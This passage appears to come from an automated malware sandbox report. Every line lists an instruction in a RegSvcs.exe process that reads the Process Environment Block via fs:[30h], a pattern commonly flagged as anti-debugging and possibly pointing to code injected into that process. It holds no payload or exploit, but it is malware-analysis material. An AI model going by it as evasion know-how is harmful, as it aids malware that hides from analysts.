Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	6_2_015FA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	6_2_015FA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AC3CD mov eax, dword ptr fs:[00000030h]	6_2_016AC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016763C0 mov eax, dword ptr fs:[00000030h]	6_2_016763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E3DB mov eax, dword ptr fs:[00000030h]	6_2_0169E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E3DB mov eax, dword ptr fs:[00000030h]	6_2_0169E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E3DB mov ecx, dword ptr fs:[00000030h]	6_2_0169E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0169E3DB mov eax, dword ptr fs:[00000030h]	6_2_0169E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016943D4 mov eax, dword ptr fs:[00000030h]	6_2_016943D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016943D4 mov eax, dword ptr fs:[00000030h]	6_2_016943D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E8397 mov eax, dword ptr fs:[00000030h]	6_2_015E8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E8397 mov eax, dword ptr fs:[00000030h]	6_2_015E8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E8397 mov eax, dword ptr fs:[00000030h]	6_2_015E8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EE388 mov eax, dword ptr fs:[00000030h]	6_2_015EE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EE388 mov eax, dword ptr fs:[00000030h]	6_2_015EE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EE388 mov eax, dword ptr fs:[00000030h]	6_2_015EE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161438F mov eax, dword ptr fs:[00000030h]	6_2_0161438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161438F mov eax, dword ptr fs:[00000030h]	6_2_0161438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F6259 mov eax, dword ptr fs:[00000030h]	6_2_015F6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EA250 mov eax, dword ptr fs:[00000030h]	6_2_015EA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016A0274 mov eax, dword ptr fs:[00000030h]	6_2_016A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01678243 mov eax, dword ptr fs:[00000030h]	6_2_01678243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01678243 mov ecx, dword ptr fs:[00000030h]	6_2_01678243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C625D mov eax, dword ptr fs:[00000030h]	6_2_016C625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E826B mov eax, dword ptr fs:[00000030h]	6_2_015E826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AA250 mov eax, dword ptr fs:[00000030h]	6_2_016AA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AA250 mov eax, dword ptr fs:[00000030h]	6_2_016AA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4260 mov eax, dword ptr fs:[00000030h]	6_2_015F4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4260 mov eax, dword ptr fs:[00000030h]	6_2_015F4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F4260 mov eax, dword ptr fs:[00000030h]	6_2_015F4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E823B mov eax, dword ptr fs:[00000030h]	6_2_015E823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016002E1 mov eax, dword ptr fs:[00000030h]	6_2_016002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016002E1 mov eax, dword ptr fs:[00000030h]	6_2_016002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016002E1 mov eax, dword ptr fs:[00000030h]	6_2_016002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	6_2_015FA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	6_2_015FA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	6_2_015FA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	6_2_015FA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	6_2_015FA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C62D6 mov eax, dword ptr fs:[00000030h]	6_2_016C62D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016002A0 mov eax, dword ptr fs:[00000030h]	6_2_016002A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016002A0 mov eax, dword ptr fs:[00000030h]	6_2_016002A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016862A0 mov eax, dword ptr fs:[00000030h]	6_2_016862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016862A0 mov ecx, dword ptr fs:[00000030h]	6_2_016862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016862A0 mov eax, dword ptr fs:[00000030h]	6_2_016862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016862A0 mov eax, dword ptr fs:[00000030h]	6_2_016862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016862A0 mov eax, dword ptr fs:[00000030h]	6_2_016862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016862A0 mov eax, dword ptr fs:[00000030h]	6_2_016862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01670283 mov eax, dword ptr fs:[00000030h]	6_2_01670283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01670283 mov eax, dword ptr fs:[00000030h]	6_2_01670283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01670283 mov eax, dword ptr fs:[00000030h]	6_2_01670283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E284 mov eax, dword ptr fs:[00000030h]	6_2_0162E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E284 mov eax, dword ptr fs:[00000030h]	6_2_0162E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162656A mov eax, dword ptr fs:[00000030h]	6_2_0162656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162656A mov eax, dword ptr fs:[00000030h]	6_2_0162656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162656A mov eax, dword ptr fs:[00000030h]	6_2_0162656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F8550 mov eax, dword ptr fs:[00000030h]	6_2_015F8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F8550 mov eax, dword ptr fs:[00000030h]	6_2_015F8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535 mov eax, dword ptr fs:[00000030h]	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535 mov eax, dword ptr fs:[00000030h]	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535 mov eax, dword ptr fs:[00000030h]	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535 mov eax, dword ptr fs:[00000030h]	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535 mov eax, dword ptr fs:[00000030h]	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600535 mov eax, dword ptr fs:[00000030h]	6_2_01600535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E53E mov eax, dword ptr fs:[00000030h]	6_2_0161E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E53E mov eax, dword ptr fs:[00000030h]	6_2_0161E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E53E mov eax, dword ptr fs:[00000030h]	6_2_0161E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E53E mov eax, dword ptr fs:[00000030h]	6_2_0161E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E53E mov eax, dword ptr fs:[00000030h]	6_2_0161E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01686500 mov eax, dword ptr fs:[00000030h]	6_2_01686500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016C4500 mov eax, dword ptr fs:[00000030h]	6_2_016C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0161E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F65D0 mov eax, dword ptr fs:[00000030h]	6_2_015F65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C5ED mov eax, dword ptr fs:[00000030h]	6_2_0162C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C5ED mov eax, dword ptr fs:[00000030h]	6_2_0162C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E5CF mov eax, dword ptr fs:[00000030h]	6_2_0162E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E5CF mov eax, dword ptr fs:[00000030h]	6_2_0162E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0162A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0162A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F25E0 mov eax, dword ptr fs:[00000030h]	6_2_015F25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016705A7 mov eax, dword ptr fs:[00000030h]	6_2_016705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016705A7 mov eax, dword ptr fs:[00000030h]	6_2_016705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016705A7 mov eax, dword ptr fs:[00000030h]	6_2_016705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016145B1 mov eax, dword ptr fs:[00000030h]	6_2_016145B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016145B1 mov eax, dword ptr fs:[00000030h]	6_2_016145B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F2582 mov eax, dword ptr fs:[00000030h]	6_2_015F2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F2582 mov ecx, dword ptr fs:[00000030h]	6_2_015F2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01624588 mov eax, dword ptr fs:[00000030h]	6_2_01624588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E59C mov eax, dword ptr fs:[00000030h]	6_2_0162E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015E645D mov eax, dword ptr fs:[00000030h]	6_2_015E645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167C460 mov ecx, dword ptr fs:[00000030h]	6_2_0167C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161A470 mov eax, dword ptr fs:[00000030h]	6_2_0161A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161A470 mov eax, dword ptr fs:[00000030h]	6_2_0161A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161A470 mov eax, dword ptr fs:[00000030h]	6_2_0161A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162E443 mov eax, dword ptr fs:[00000030h]	6_2_0162E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0161245A mov eax, dword ptr fs:[00000030h]	6_2_0161245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AA456 mov eax, dword ptr fs:[00000030h]	6_2_016AA456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01676420 mov eax, dword ptr fs:[00000030h]	6_2_01676420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01628402 mov eax, dword ptr fs:[00000030h]	6_2_01628402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01628402 mov eax, dword ptr fs:[00000030h]	6_2_01628402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01628402 mov eax, dword ptr fs:[00000030h]	6_2_01628402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EC427 mov eax, dword ptr fs:[00000030h]	6_2_015EC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EE420 mov eax, dword ptr fs:[00000030h]	6_2_015EE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EE420 mov eax, dword ptr fs:[00000030h]	6_2_015EE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015EE420 mov eax, dword ptr fs:[00000030h]	6_2_015EE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F04E5 mov ecx, dword ptr fs:[00000030h]	6_2_015F04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016244B0 mov ecx, dword ptr fs:[00000030h]	6_2_016244B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167A4B0 mov eax, dword ptr fs:[00000030h]	6_2_0167A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_016AA49A mov eax, dword ptr fs:[00000030h]	6_2_016AA49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F64AB mov eax, dword ptr fs:[00000030h]	6_2_015F64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0750 mov eax, dword ptr fs:[00000030h]	6_2_015F0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01600770 mov eax, dword ptr fs:[00000030h]	6_2_01600770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F8770 mov eax, dword ptr fs:[00000030h]	6_2_015F8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162674D mov esi, dword ptr fs:[00000030h]	6_2_0162674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162674D mov eax, dword ptr fs:[00000030h]	6_2_0162674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162674D mov eax, dword ptr fs:[00000030h]	6_2_0162674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01674755 mov eax, dword ptr fs:[00000030h]	6_2_01674755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632750 mov eax, dword ptr fs:[00000030h]	6_2_01632750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01632750 mov eax, dword ptr fs:[00000030h]	6_2_01632750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167E75D mov eax, dword ptr fs:[00000030h]	6_2_0167E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C720 mov eax, dword ptr fs:[00000030h]	6_2_0162C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C720 mov eax, dword ptr fs:[00000030h]	6_2_0162C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0710 mov eax, dword ptr fs:[00000030h]	6_2_015F0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0166C730 mov eax, dword ptr fs:[00000030h]	6_2_0166C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162273C mov eax, dword ptr fs:[00000030h]	6_2_0162273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162273C mov ecx, dword ptr fs:[00000030h]	6_2_0162273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162273C mov eax, dword ptr fs:[00000030h]	6_2_0162273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162C700 mov eax, dword ptr fs:[00000030h]	6_2_0162C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01620710 mov eax, dword ptr fs:[00000030h]	6_2_01620710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167E7E1 mov eax, dword ptr fs:[00000030h]	6_2_0167E7E1
